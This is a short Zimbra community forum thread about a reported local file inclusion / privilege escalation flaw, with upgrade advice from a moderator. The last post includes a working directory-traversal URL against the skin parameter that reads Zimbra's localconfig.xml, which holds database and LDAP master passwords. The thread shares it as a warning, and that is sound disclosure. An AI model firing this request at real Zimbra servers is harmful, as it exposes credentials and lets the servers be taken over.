Results 1 to 6 of 6

Thread: Zimbra - 0day exploit / Privilegie escalation via LFI

Hybrid View

  1. #1
    Join Date
    Mar 2010
    Posts
    17
    Rep Power
    5

    Default Zimbra - 0day exploit / Privilegie escalation via LFI

    Hi,

    Just wanted to inform the forum about this:

    Zimbra - 0day exploit / Privilegie escalation via LFI

    If anybody has ZimbraAdmin publicly accesible please protect yourself until Zimbra releases a patch/update.

    Best regards,
    Joel.

  2. #2
    phoenix is offline Zimbra Consultant & Moderator
    Join Date
    Sep 2005
    Location
    Vannes, France
    Posts
    23,587
    Rep Power
    58

    Default

    Quote Originally Posted by joelserrano View Post
    If anybody has ZimbraAdmin publicly accesible please protect yourself until Zimbra releases a patch/update.
    There is no vulnerability in the current version of ZCS. Did you not see any of the other recent posts on this topic or the two posts from Zimbra that describe the status of this vulnerability?
    Regards


    Bill


    Acompli: A new adventure for Co-Founder KevinH.

  3. #3
    Join Date
    Mar 2010
    Posts
    17
    Rep Power
    5

    Default

    Quote Originally Posted by phoenix View Post
    There is no vulnerability in the current version of ZCS. Did you not see any of the other recent posts on this topic or the two posts from Zimbra that describe the status of this vulnerability?
    Well to be honest no, I just posted about it. Sorry if this is a duplicated (or triplicated) thread. It did feel strange to not see anybody talking about it.


    Best regards,

  4. #4
    Join Date
    Aug 2007
    Location
    Delaware USA
    Posts
    39
    Rep Power
    8

    Default

    I have the same issue. is there a patch/fix for version 6.0_16

  5. #5
    phoenix is offline Zimbra Consultant & Moderator
    Join Date
    Sep 2005
    Location
    Vannes, France
    Posts
    23,587
    Rep Power
    58

    Default

    Quote Originally Posted by ljramos View Post
    I have the same issue. is there a patch/fix for version 6.0_16
    No there isn't, you need to upgrade to either the 7.2.6 or 8.0.6 version of ZCS.
    Regards


    Bill


    Acompli: A new adventure for Co-Founder KevinH.

  6. #6
    Join Date
    Jan 2014
    Posts
    1
    Rep Power
    1

    Thumbs down 7.2.6 still affected

    Quote Originally Posted by phoenix View Post
    No there isn't, you need to upgrade to either the 7.2.6 or 8.0.6 version of ZCS.
    We upgraded to 7.2.6 but the directory traversal bug or file inclusion bug is still not fixed. You can download any file through TemplateMsg.js.zgz

    The wellknown example:
    Code:
    https://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
    After fixing this bug everyone should change the master passwords in the localconfig.xml, especially mysql and ldap.

Similar Threads

  1. Security Guidance for reported "0day Exploit"
    By tonster in forum Announcements
    Replies: 1
    Last Post: 01-31-2014, 10:03 AM
  2. Security Guidance for reported "0day Exploit"
    By tonster in forum Known Issues
    Replies: 0
    Last Post: 12-09-2013, 09:25 AM
  3. Potential Information Disclosure or Privilege Escalation in CGI
    By PastorOfMuppets in forum Administrators
    Replies: 4
    Last Post: 04-23-2012, 09:54 PM
  4. case escalation with zimbra support
    By SageMajor in forum Administrators
    Replies: 2
    Last Post: 05-07-2009, 03:43 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •